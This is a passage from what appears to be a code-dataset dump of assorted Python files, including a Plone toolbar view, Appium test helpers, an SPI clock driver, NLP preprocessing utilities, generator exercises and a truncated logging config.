"config.REDIS_CACHE_HOST", "line_number": 88, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_PORT", "line_number": 88, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_DB", "line_number": 88, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_TIMEOUT", "line_number": 89, "usage_type": "attribute"}]} +{"seq_id": "109235743", "text": "from zope.component import getMultiAdapter\n#from zope.component import getUtility\nfrom zope.publisher.browser import BrowserView\n#from plone.registry.interfaces import IRegistry\nfrom plone.memoize.instance import memoize\nfrom plone.app.layout.viewlets.common import PersonalBarViewlet as BasePersonalBarViewlet\nfrom Acquisition import aq_inner\nfrom urllib import unquote\n\n#from Acquisition import aq_base\nfrom AccessControl import getSecurityManager\n#from Products.CMFCore.utils import getToolByName\n#from Products.CMFPlone.interfaces import IPloneSiteRoot\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\n\nclass Toolbar(BrowserView):\n \"\"\"The view containing the overlay toolbar\n \"\"\"\n\n def __call__(self):\n # Disable theming\n self.request.response.setHeader('X-Theme-Disabled', 'True')\n\n # Set the CMSUI skin so that we get the correct resources\n self.context.changeSkin('toolbar', self.request)\n\n # Commonly useful variables\n self.securityManager = getSecurityManager()\n self.anonymous = self.portalState.anonymous()\n self.tools = getMultiAdapter((self.context, self.request), name=u'plone_tools')\n\n # Render the template\n return self.index()\n\n # Personal actions\n\n @property\n @memoize\n def contextState(self):\n return getMultiAdapter((self.context, self.request), name=u'plone_context_state')\n\n @property\n @memoize\n def portalState(self):\n return getMultiAdapter((self.context, self.request), name=u'plone_portal_state')\n\n @memoize\n def personalActions(self):\n \"\"\"Get the personal actions\n \"\"\"\n actions = []\n for action in self.contextState.actions('user'):\n actions.append({\n 'id': action['id'],\n 'url': action['url'],\n 'title': action['title'],\n 'description': action['description'],\n })\n\n return actions\n\n @memoize\n def userName(self):\n \"\"\"Get the username of the currently logged in user\n \"\"\"\n if self.anonymous:\n return None\n\n member = self.portalState.member()\n userid = member.getId()\n\n membership = self.tools.membership()\n memberInfo = membership.getMemberInfo(userid)\n\n fullname = userid\n\n # Member info is None if there's no Plone user object, as when using OpenID.\n if memberInfo is not None:\n fullname = memberInfo.get('fullname', '') or fullname\n\n return fullname\n\n @memoize\n def userHomeLinkURL(self):\n \"\"\"Get the URL of the user's home page (profile age)\n \"\"\"\n member = self.portalState.member()\n userid = member.getId()\n return \"%s/author/%s\" % (self.portalState.navigation_root_url(), userid)\n\n @memoize\n def userPortrait(self):\n \"\"\"Get the URL of the user's portrait\n \"\"\"\n\n member = self.portalState.member()\n membership = self.tools.membership()\n portrait = membership.getPersonalPortrait(member.getId());\n if portrait is not None:\n return portrait.absolute_url()\n\n @memoize\n def workflowState(self):\n \"\"\"Get the name of the workflow state\n \"\"\"\n state = self.contextState.workflow_state()\n if state is None:\n return None\n workflows = self.tools.workflow().getWorkflowsFor(self.context)\n if workflows:\n for w in workflows:\n if state in w.states:\n return w.states[state].title or state\n return state\n\n @memoize\n def editLink(self):\n \"\"\"Get the URL of the edit action - taking locking into account\n \"\"\"\n if not self.securityManager.checkPermission('Modify portal content', self.context):\n return None\n if self.contextState.is_locked():\n return self.context.absolute_url() + \"/@@toolbar-lock-info\"\n objectActions = self.contextState.actions('object')\n for action in objectActions:\n if action['id'] == self.settings.editActionId:\n return \"%s?last_referer=%s\" % (action['url'], self.context.absolute_url())\n return None\n\n @memoize\n def settingsActions(self):\n \"\"\"Render every action other than the excluded ones (edit, view).\n Use the action icon if applicable, but fall back on the default icon.\n \"\"\"\n\n actions = []\n objectActions = self.contextState.actions('object')\n\n defaultIcon = self.portalState.navigation_root_url() + self.settings.defaultActionIcon\n\n for action in objectActions:\n if action['id'] in self.settings.excludedActionIds:\n continue\n\n icon = action['icon']\n if not icon:\n icon = defaultIcon\n\n actions.append({\n 'id': action['id'],\n 'url': action['url'],\n 'title': action['title'],\n 'description': action['description'],\n 'icon': icon,\n })\n\n return actions\n\n @memoize\n def baseURL(self):\n return self.context.absolute_url()\n\n @memoize\n def prepareObjectTabs(self, default_tab='view',\n sort_first=['folderContents']):\n \"\"\"Prepare the object tabs by determining their order and working\n out which tab is selected. Used in global_contentviews.pt\n \"\"\"\n context = aq_inner(self.context)\n context_url = context.absolute_url()\n context_fti = context.getTypeInfo()\n\n context_state = getMultiAdapter(\n (context, self.request), name=u'plone_context_state')\n actions = context_state.actions\n\n action_list = []\n if context_state.is_structural_folder():\n action_list = actions('folder')\n action_list.extend(actions('object'))\n\n tabs = []\n found_selected = False\n fallback_action = None\n\n # we use the context-acquired request object here, which is\n # different from the request fetching the tile HTML\n request_url = self.context.REQUEST['ACTUAL_URL']\n request_url_path = request_url[len(context_url):]\n\n if request_url_path.startswith('/'):\n request_url_path = request_url_path[1:]\n\n for action in action_list:\n item = {'title': action['title'],\n 'id': action['id'],\n 'url': '',\n 'selected': False}\n\n action_url = action['url'].strip()\n starts = action_url.startswith\n if starts('http') or starts('javascript'):\n item['url'] = action_url\n else:\n item['url'] = '%s/%s' % (context_url, action_url)\n\n action_method = item['url'].split('/')[-1]\n\n # Action method may be a method alias:\n # Attempt to resolve to a template.\n action_method = context_fti.queryMethodID(\n action_method, default=action_method)\n if action_method:\n request_action = unquote(request_url_path)\n request_action = context_fti.queryMethodID(\n request_action, default=request_action)\n if action_method == request_action:\n item['selected'] = True\n found_selected = True\n\n current_id = item['id']\n if current_id == default_tab:\n fallback_action = item\n\n tabs.append(item)\n\n if not found_selected and fallback_action is not None:\n fallback_action['selected'] = True\n\n def sortOrder(tab):\n try:\n return sort_first.index(tab['id'])\n except ValueError:\n return 255\n\n tabs.sort(key=sortOrder)\n return tabs\n\n def object_actions(self):\n context = aq_inner(self.context)\n context_state = getMultiAdapter((context, self.request),\n name=u'plone_context_state')\n\n return context_state.actions('object_actions')\n\n def icon(self, action):\n return action.get('icon', None)\n\n\nclass PersonalBarViewlet(BasePersonalBarViewlet):\n\n index = ViewPageTemplateFile('templates/personal_bar.pt')\n", "sub_path": "plone/app/toolbar/toolbar.py", "file_name": "toolbar.py", "file_ext": "py", "file_size_in_byte": 8306, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "zope.publisher.browser.BrowserView", "line_number": 17, "usage_type": "name"}, {"api_name": "AccessControl.getSecurityManager", "line_number": 29, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 31, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 41, "usage_type": "call"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 39, "usage_type": "name"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 46, "usage_type": "call"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 44, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 48, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 63, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 84, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 92, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 103, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 117, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 131, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 160, "usage_type": "name"}, {"api_name": "Acquisition.aq_inner", "line_number": 170, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 174, "usage_type": "call"}, {"api_name": "urllib.unquote", "line_number": 215, "usage_type": "call"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 164, "usage_type": "name"}, {"api_name": "Acquisition.aq_inner", "line_number": 241, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 242, "usage_type": "call"}, {"api_name": "plone.app.layout.viewlets.common.PersonalBarViewlet", "line_number": 251, "usage_type": "name"}, {"api_name": "Products.Five.browser.pagetemplatefile.ViewPageTemplateFile", "line_number": 253, "usage_type": "call"}]} +{"seq_id": "7607897", "text": "import scipy.stats as stats\nimport sys\nimport numpy as np\nimport tqdm\nfrom sklearn.utils.extmath import softmax\nimport h5py\nimport matplotlib.pyplot as plt\nfrom itertools import permutations\ndata=['Kommission', 'Kommission@@', 'Kommissions@@', 'Kommiss@@', 'Kommissionspräsi@@',\n 'Kommissionspräsident', 'Rat', 'Parlament', 'Kommissionspräsidenten',\n 'Kommissionsvorschlag', 'Kommissionsmitgli@@', 'Kommissionsmitglieder',\n 'Kommissionsmitglied', 'Kommissar', 'Kommissarin', 'Berichterstatterin',\n 'Mitgliedstaaten', 'Parlaments', 'Vorschlag', 'Berichterstatters']\n\n\n\nsample_width = len(data[0])\n\nx = np.arange(sample_width)\n\n\nmode = 'gaussian'\n\ndef scatter(a, dim, index, b): # a inplace\n expanded_index = tuple([index if dim==i else np.arange(a.shape[i]).reshape([-1 if i==j else 1 for j in range(a.ndim)]) for i in range(a.ndim)])\n a[expanded_index] = b\n print(\"a;\",a)\n print(expanded_index)\n\nif mode == 'gaussian':\n std = 1\n offset = 0\n mean = 0\n sample_width = 0\n softmax_position = \"presoftmax\"\n softmax_temperature = 1\n output_path = \"out.txt\"\n\n distribution_func = stats.norm(mean, std)\n\nelif mode == 'linear':\n k = 0\n b = 1.0\n offset = 0\n sample_width = 0\n softmax_position = 0\n\nfigsize = 20, 10\nfigure, ax = plt.subplots(figsize=figsize)\n\ny_sample = distribution_func.pdf(x)\nprint(y_sample)\ny_sample = softmax(np.expand_dims(y_sample,0)).squeeze(0)\ny_sample = y_sample[:10]\nprint(len(y_sample))\nplt.plot(data[:len(y_sample)], y_sample, marker=\"o\")\nplt.show()\n\n\"\"\"y_sample=[[2,2,2,2,2.0,0,0,0,0,0]]\ny_sample=softmax(y_sample)\nplt.plot(data[:len(y_sample[0])], y_sample[0], marker=\"o\")\nprint(data)\nplt.show()\"\"\"\n\nprint(y_sample)", "sub_path": "D2GPo/extra_processing.py", "file_name": "extra_processing.py", "file_ext": "py", "file_size_in_byte": 1710, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.arange", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "sklearn.utils.extmath.softmax", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "231485389", "text": "from baseView.baseView import BaseView\nfrom selenium.webdriver.common.by import By\nimport os\nimport time\n\nclass Common(BaseView):\n\tcancelBtn = (By.ID, 'android:id/button2')\n\tskiptBtn=(By.ID,'com.tal.kaoyan:id/tv_skip')\n\n\n\tdef check_cancelBtn(self):\n\t\ttry:\n\t\t\tcancelBtn=self.ele_is_visibility(self.cancelBtn)\n\t\texcept:\n\t\t\tself.logger.info('没有取消升级按钮')\n\t\telse:\n\t\t\tcancelBtn.click()\n\n\tdef check_skiptBtn(self):\n\t\ttry:\n\t\t\tskiptBtn=self.ele_is_visibility(self.skiptBtn)\n\t\texcept:\n\t\t\tself.logger.info('没有跳过按钮')\n\t\telse:\n\t\t\tskiptBtn.click()\n\n\tdef get_size(self):\n\t\tx = self.driver.get_window_size()['width']\n\t\ty = self.driver.get_window_size()['height']\n\t\treturn x, y\n\n\tdef swipeLeft(self):\n\t\tsize = self.get_size()\n\t\tx1 = int(size[0] * 0.9)\n\t\ty = int(size[1] * 0.5)\n\t\tx2 = int(size[0] * 0.2)\n\t\tself.driver.swipe(x1, y, x2, y, 1000)\n\n\tdef getTime(self):\n\t\treturn time.strftime(\"%Y-%m-%d %H_%M_%S\")\n\n\tdef getScreenShot(self,text):\n\t\ttime=self.getTime()\n\t\timage_file=os.path.dirname(os.path.dirname(__file__))+'/screenshots/%s_%s.png' %(text,time)\n\t\tself.logger.info('get %s screenshot' %text)\n\t\tself.driver.get_screenshot_as_file(image_file)\n\nif __name__=='__main__':\n\tcommon=Common()\n\tcommon.check_cancelBtn()\n\tcommon.check_skiptBtn()\n\tcommon.getScreenShot('登录页面截图')", "sub_path": "appium_05test/common/common_fun.py", "file_name": "common_fun.py", "file_ext": "py", "file_size_in_byte": 1298, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "baseView.baseView.BaseView", "line_number": 6, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 7, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 7, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 8, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 8, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}]} +{"seq_id": "643468222", "text": "import spidev\n\n\nclass Clock:\n\n def __init__(self, hora_inicial):\n self.spi = spidev.SpiDev()\n self.spi.open(0,1)\n self.spi.max_speed_hz = 312500\n self.spi.mode = 1\n self.spi.cshigh = True\n self.spi.xfer2([0x8F, 0x00])\n self.spi.xfer2( 0x80 + hora_inicial)\n\n def cambiar_hora(self, hora):\n self.spi.xfer2(0x80 + hora)\n\n def devolver_hora(self):\n datos = self.spi.xfer2( [0x00, 1, 2, 3, 4, 5, 6, 7] )\n del datos[4]\n del datos[0]\n datos[0], datos[2] = datos[2], datos[0]\n hora = self.hexa_to_dec(datos)\n return hora\n\n def hexa_to_dec(self, hex_numbers):\n dec_numbers = []\n for hex_number in hex_numbers:\n MSB_number = hex_number >> 4\n LSB_number = hex_number & 0x0F\n dec_numbers.append( MSB_number * 10 + LSB_number )\n return dec_numbers\n ", "sub_path": "3-Proyecto_FInal/Modulos/clock.py", "file_name": "clock.py", "file_ext": "py", "file_size_in_byte": 903, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "spidev.SpiDev", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "437366188", "text": "import pandas as pd\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser(description='Small script to create sample from given dataset')\nparser.add_argument('input_path', metavar='P', type=str, nargs='?',\n help='path for dataset need to be sampled')\nparser.add_argument('--n', metavar='N', type=int, nargs='?', default=1000,\n help='number of data counts')\nparser.add_argument('--output_path', metavar='O', type=str, nargs='?', default=None,\n help='output path for new sample')\nparser.add_argument('--choice', metavar='C', type=str, nargs='?', default='straight',\n help='choose straight or random')\n\n\n\nargs = parser.parse_args()\nif args.output_path is None:\n args.output_path = os.path.join('/'.join(args.input_path.split('/')[:-1]), # drop filename\n 'sample_{}_{}.csv'.format(args.n, args.choice))\n\ndf = pd.read_csv(args.input_path)\nif args.choice == 'straight':\n df.iloc[:args.n].to_csv(args.output_path, index=False)\nif args.choice == 'random':\n df.sample(n=args.n).to_csv(args.output_path, index=False)\n", "sub_path": "src/old code base/dataset_related/dataset_sampler.py", "file_name": "dataset_sampler.py", "file_ext": "py", "file_size_in_byte": 1149, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "595049888", "text": "#!/usr/bin/env python3\n\"\"\"Script used to download the ANTs data from the storage server.\n\nScript to download all the UK BIOBANK files preprocessed using the\nscripts available at the imaging_preprocessing_ANTs folder.\n\nNOTE: Only for internal use at the Machine Learning in Mental Health Lab.\n\"\"\"\nimport argparse\nfrom pathlib import Path\nfrom shutil import copyfile\n\nPROJECT_ROOT = Path.cwd()\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-N', '--nas_path',\n dest='nas_path_str',\n help='Path to the Network Attached Storage system.')\n\nparser.add_argument('-S', '--scanner_name',\n dest='scanner_name',\n help='Name of the scanner.')\n\nparser.add_argument('-O', '--output_path',\n dest='output_path_str',\n help='Path to the local output folder.')\n\nargs = parser.parse_args()\n\n\ndef main(nas_path_str, scanner_name, output_path_str):\n \"\"\"Perform download of selected datasets from the network-attached storage.\"\"\"\n nas_path = Path(nas_path_str)\n output_path = Path(output_path_str)\n\n dataset_name = 'BIOBANK'\n\n dataset_output_path = output_path / dataset_name\n dataset_output_path.mkdir(exist_ok=True)\n\n selected_path = nas_path / 'ANTS_NonLinear_preprocessed' / dataset_name / scanner_name\n\n for file_path in selected_path.glob('*.nii.gz'):\n print(file_path)\n copyfile(str(file_path), str(dataset_output_path / file_path.name))\n\n\nif __name__ == '__main__':\n main(args.nas_path_str, args.scanner_name, args.output_path_str)\n", "sub_path": "src/download/download_ants_data.py", "file_name": "download_ants_data.py", "file_ext": "py", "file_size_in_byte": 1583, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pathlib.Path.cwd", "line_number": 13, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 13, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 34, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 35, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "648838767", "text": "import numpy as np\nimport pandas as pd\n\n\nbatch_size = 16\nen_max_length = 10\nzh_max_length = 15\nhidden = 256\nSAMPLE = 5000\n\nimport pickle\ndef save_obj(obj, name):\n with open(f'./output/{name}.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\ndef load_obj(name):\n with open(f'./output/{name}.pkl', 'rb') as f:\n return pickle.load(f)\n\n\nclass Pre_Pro():\n def __init__(self, symbol):\n self.symbol = symbol\n\n def process_en(self, sen):\n for s in self.symbol:\n sen = sen.replace(s, ' ' + s + ' ')\n return np.array(sen.split(), dtype=str)\n\n def process_zh(self, sen, mode):\n if mode == 'org':\n return np.array([''] + list(sen) + [''], dtype=str)\n elif mode == 'dec_in':\n return np.array([''] + list(sen), dtype=str)\n elif mode == 'dec_out':\n return np.array(list(sen) + [''], dtype=str)\n\n\ndef get_data(path):\n data = pd.read_table(path, header=None)\n data.columns = ['inputs', 'targets']\n symbol = ['.', ',', '!', '?', '\"', ':', ';',\n '。', ',', '!', '?', '“', '”', ':', ';']\n pre_pro = Pre_Pro(symbol)\n data['enc_inputs'] = data['inputs'].apply(lambda x: pre_pro.process_en(x))\n data['dec_inputs'] = data['targets'].apply(lambda x: pre_pro.process_zh(x, 'dec_in'))\n data['outputs'] = data['targets'].apply(lambda x: pre_pro.process_zh(x, 'org'))\n data['targets'] = data['targets'].apply(lambda x: pre_pro.process_zh(x, 'dec_out'))\n return data\n\n\ndef get_word2index(word_lists):\n from collections import Counter\n words_counter = Counter()\n word2index = {}\n word2index['PAD'] = 0\n word2index['UNK'] = 1\n for word_list in word_lists:\n for word in word_list:\n words_counter[word] += 1\n for i, (word, _) in enumerate(words_counter.most_common(len(words_counter))):\n word2index[word] = i + 2\n return word2index\n\n\ndef make_data(word_lists, max_length, word2index):\n x = np.zeros((len(word_lists), max_length), dtype=int)\n for i, word_list in enumerate(word_lists):\n for j, word in enumerate(word_list):\n if j == max_length:\n break\n x[i][j] = word2index.get(word, 1)\n return x\n\n\ndef get_sort_seq(enc_inputs, dec_inputs, targets, mode):\n seqs_len = []\n for seq in enc_inputs:\n seq_len = len(seq) - np.equal(seq, 0).sum()\n if seq_len > 0:\n seqs_len.append(seq_len)\n else:\n seqs_len.append(1)\n index = list(np.argsort(seqs_len)[::-1])\n seqs_len = sorted(seqs_len, reverse=True)\n\n X1, X2, y = [], [], []\n if mode == 'predict':\n for i, _ in enumerate(enc_inputs):\n X1.append(enc_inputs[index[i]])\n X2.append(dec_inputs[index[i]])\n else:\n for i, _ in enumerate(enc_inputs):\n X1.append(enc_inputs[index[i]])\n X2.append(dec_inputs[index[i]])\n y.append(targets[index[i]])\n return X1, seqs_len, X2, y", "sub_path": "机器翻译/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 3018, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pickle.dump", "line_number": 14, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 40, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "627316580", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('tomographic_db', '0003_tomoimages_imagename'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='tomoimages',\n name='imageUrl',\n field=models.ImageField(upload_to=b'JGR_figures'),\n ),\n ]\n", "sub_path": "tomographic_db/migrations/0004_auto_20150628_1648.py", "file_name": "0004_auto_20150628_1648.py", "file_ext": "py", "file_size_in_byte": 429, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "69265729", "text": "#!/usr/bin/env python3\n\nimport configparser\nimport exceptions\nimport output as op\nimport os\n\nconfig_file = \"config.ini\"\nif os.path.exists(config_file):\n config = configparser.ConfigParser()\n config.read(config_file)\n\n SWING_API_KEY = config['keys']['swing_api_key']\n CURRENT_CAPITAL = float(config['account']['current_capital'])\n COMMISSION_COST = float(config['account']['commission_cost'])\n VERBOSITY = int(config['app']['verbosity'])\n WRITE_TO_FILE = True if config['app']['write_to_file'] == \"true\" else False\nelse:\n op.log_error(exceptions.DocumentError)", "sub_path": "config_loader.py", "file_name": "config_loader.py", "file_ext": "py", "file_size_in_byte": 583, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 10, "usage_type": "call"}, {"api_name": "output.log_error", "line_number": 19, "usage_type": "call"}, {"api_name": "exceptions.DocumentError", "line_number": 19, "usage_type": "attribute"}]} +{"seq_id": "158545818", "text": "import json\nimport urllib\nfrom urllib import parse, request\n\n# Obtain an authentication ID/token pair from your\n# SmartyStreets account and put them in below.\n\nLOCATION = 'https://api.smartystreets.com/street-address'\nQUERY_STRING = urllib.parse.urlencode({ # entire query sting must be URL-encoded\n 'auth-id': r'YOUR-AUTH-ID',\n 'auth-token': r'YOUR-AUTH-TOKEN',\n 'street': '1 infinite loop',\n 'city': 'cupertino',\n 'state': 'ca',\n 'zipcode': '95014',\n 'candidates': '1'\n})\nURL = LOCATION + '?' + QUERY_STRING\n\n# Perform request, read result, and load from string into Python object\nresponse = urllib.request.urlopen(URL).read()\nresults = json.loads(response.decode('utf-8'))\n\n# Pretty print for demo purposes\npretty = json.dumps(results, sort_keys=True, indent=4)\nprint(pretty)\n\n# Then, to use the results in Python, very easy... for example:\nprint(results[0]['delivery_line_1'])", "sub_path": "python/street-address-python3.py", "file_name": "street-address-python3.py", "file_ext": "py", "file_size_in_byte": 895, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "urllib.parse.urlencode", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 9, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "200995080", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@File : january13.py\n@Author: lee\n@Date : 2020/1/7 6:42\n@Desc : \n'''\n# int\nprint(int('0b100', base=2))\n# float\nprint(float('1e+9'))\nprint(float('1e-6'))\na = 1.2e-4\nprint(\"%.5f\" % a)\nprint(\"{:.5f}\".format(a))\nprint(round(a, 5))\n# 判断字符串是否是可迭代对象\nfrom collections import Iterable, Iterator\n\nb = '你好'\nprint(isinstance(b, Iterable)) # False\nprint(hasattr(str, '__iter__'))\nmyList = [11, 10, 1, 2, 9, 3, 8, 4, 5, ]\nobj = reversed(myList)\nprint(hasattr(obj, '__next__')) # True\n# 生成器应用\nprint((i for i in range(10)))\n\n\ndef gen_obj(lst):\n for i in lst:\n a = yield i\n print(\"a is %s\" % a)\n\n\ng = gen_obj(myList)\n# print(next(g))\ng.__next__()\ng.send(100)\n\n\n# 序列协议\nclass Book:\n def __init__(self):\n self.book = [\"红楼梦\", \"西游记\", \"金瓶梅\"]\n\n def __getitem__(self, item):\n print(\"start Book-getitem func\")\n return self.book[item]\n\n\nb = Book()\nfor i in b:\n print(i)\nprint(b[2]) # 金瓶梅\n\n\nclass Person:\n def __init__(self):\n self.msg = {\"name\": \"lee\", \"age\": 24}\n\n def __iter__(self):\n for i in self.msg.items():\n yield i\n\n def __getitem__(self, item):\n print(\"start Person-getitem func\")\n return self.msg[item]\n\n\np = Person()\nfor i in p:\n print(i)\nprint(p[\"name\"])\n\n\n# 迭代器实现可迭代对象\nclass MyIterator(Iterator):\n def __init__(self, lst):\n self.lst = lst\n self.index = 0\n\n def __next__(self):\n if self.index == len(self.lst):\n raise StopIteration\n city = self.lst[self.index]\n self.index += 1\n return self.getCityMsg(city)\n\n def getCityMsg(self, city):\n msg = \"该%s的信息是....\" % city\n return msg\n\n\nclass MyIterable(Iterable):\n def __init__(self, lst):\n self.iterator = MyIterator(lst)\n\n def __iter__(self):\n return self.iterator\n\n\niterable = MyIterable([\"北京\", \"上海\", \"济南\"])\nfor i in iterable:\n print(i)\n\n\n# 生成器实现可迭代对象\nclass MyGenerator:\n def __init__(self, lst):\n self.lst = lst\n\n def __iter__(self):\n for i in self.lst:\n yield self.getCityMsg(i)\n\n def getCityMsg(self, city):\n msg = \"该%s信息是....\" % city\n return msg\n\n\nmy_generator = MyGenerator([\"上海\", \"济南\", \"北京\"])\nfor i in my_generator:\n print(i)\n\n\n# 生成器斐波那契数列\n\ndef fib(max):\n n, a, b = 0, 0, 1\n while n < max:\n yield b\n a, b = b, a + b\n n += 1\n return 'done'\n\n\nfor i in fib(10):\n print(i)\n\nf = fib(6)\nwhile True:\n try:\n value = next(f)\n print(value)\n except StopIteration as e:\n print(e.value)\n break\n", "sub_path": "lines_per_day/january13.py", "file_name": "january13.py", "file_ext": "py", "file_size_in_byte": 2762, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "collections.Iterable", "line_number": 22, "usage_type": "argument"}, {"api_name": "collections.Iterator", "line_number": 79, "usage_type": "name"}, {"api_name": "collections.Iterable", "line_number": 96, "usage_type": "name"}]} +{"seq_id": "455157673", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Custom logging configuration.\"\"\"\n\n# @Time : 9/22/2017 6:42 PM\n# @Author : Xuesong Wu\n# @Site : \n# @File : log_config.py\n# @Software: PyCharm Community Edition\n\nimport logging.config\n\n\ndef log_config():\n \"\"\"\n Config log with dict\n Returns: None\n\n \"\"\"\n log_config_dict = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '%(asctime)-15s, %(levelname)s, %(name)s, %(lineno)d, %(process)d, %(message)s',\n 'datefmt': '%a %d %b %Y %H:%M:%S'\n },\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'level': 'DEBUG',\n 'formatter': 'simple',\n 'stream': 'ext://sys.stdout'\n },\n 'info_file_handler': {\n 'class': 